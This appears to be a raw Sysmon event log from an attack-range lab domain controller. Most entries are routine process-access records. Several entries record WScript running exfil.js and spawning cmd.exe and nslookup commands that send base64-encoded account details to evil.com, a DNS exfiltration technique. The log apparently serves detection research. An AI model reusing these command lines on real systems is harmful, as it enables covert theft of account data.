14:16:08.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.853{2E1864BB-17A8-629A-093E-000000005F02}71724248C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-0B3E-000000005F02}8040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.860{2E1864BB-17A8-629A-0B3E-000000005F02}8040C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-093E-000000005F02}7172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsajvz.tmp 2>&1 10341000x8000000000000000194912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.822{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-0A3E-000000005F02}3620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.822{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-0A3E-000000005F02}3620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.806{2E1864BB-17A8-629A-0A3E-000000005F02}36206504C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-093E-000000005F02}7172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.806{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-0A3E-000000005F02}3620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.784{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.784{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.784{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-093E-000000005F02}7172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.784{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.784{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.784{2E1864BB-17A1-629A-783D-000000005F02}55523712C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-093E-000000005F02}7172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.798{2E1864BB-17A8-629A-093E-000000005F02}7172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsajvz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.784{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldfyrz.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.753{2E1864BB-17A8-629A-073E-000000005F02}49248124C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-083E-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.753{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-083E-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.753{2E1864BB-17A8-629A-063E-000000005F02}76048108C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-083E-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.760{2E1864BB-17A8-629A-083E-000000005F02}6688C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-063E-000000005F02}7604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldfyrz.tmp 2>&1 10341000x8000000000000000194892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.722{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-073E-000000005F02}4924C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.722{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-073E-000000005F02}4924C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.722{2E1864BB-17A8-629A-073E-000000005F02}49248124C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-063E-000000005F02}7604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.706{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-073E-000000005F02}4924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.705{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.705{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 